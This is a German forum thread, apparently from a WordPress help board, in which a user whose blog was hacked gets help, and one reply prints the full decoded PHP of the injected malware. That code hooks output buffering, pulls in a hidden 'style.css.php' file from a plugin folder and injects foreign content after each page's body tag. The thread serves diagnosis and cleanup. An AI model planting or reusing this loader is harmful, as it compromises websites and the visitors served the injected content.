Gehackt?! :shock:
ALLE?!
Das is doch'n Witz?!
Ich mein... das is auch bei der Uralt-WP-Version... da steht auch sowas drin!
Und ich mein wirklich alt...
Ich finde einiges... aber nicht wirklich irgendwas, was mir hilft :cry:
Och man, das darf doch nicht wahr sein... hätte ich den Mist bloß nicht upgedatet... ich war happy mit meiner 2.0.x Version aber nööö... "Da ist keine Sicherheit" hieß es... HA HA HA!
MIr habens vor rd. ein-eineinhalb Jahren auch einmal eine 2.0.x (oder wars eine 2.1.x) Version gehackt.
Also wenn man die von Dir geposteten "wirren" Zeichen durch einen Online-Base64-Decoder schickt (zB http://www.pixelplaner.com/de/service/onl…code/index.html) bekommt man:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/www/htdocs/v145030/tobey/onetreehill/wp-content/plugins/nextgen-gallery/admin/js/Jcrop/css/style.css.php')){include_once('/www/htdocs/v145030/tobey/onetreehill/wp-content/plugins/nextgen-gallery/admin/js/Jcrop/css/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}
Also zum einen weiteren codierten (diesma mit gzdecode zu decodierenden) Code, zum anderen sieht man einiges im Klartext. So wird zB die Existenz einer Function dgobh abgefragt oder eine style.css.php nachgeladen.
Die Googlesuche nach dgobh liefert pratksich als ersten Treffer einen Link auf http://www.simplemachines.org/community/index.php?topic=291486.0 da gehts zwar nicht um Wordpress, aber zB der Post von ccondrup erwähnt genauso wie bei Dir eine "style.css.php" die nachgeladen wird.
Eine Google-Suche nach dgobh und Wordpress liefert auch viele Links, unter anderem einen hier ins Forum: http://forum.wordpress-deutschland.org/konfiguration/…eschlichen.html
Ich empfehle dir:
1. http://wpantivirus.de/
2. http://toscho.de/2009/website-gehackt/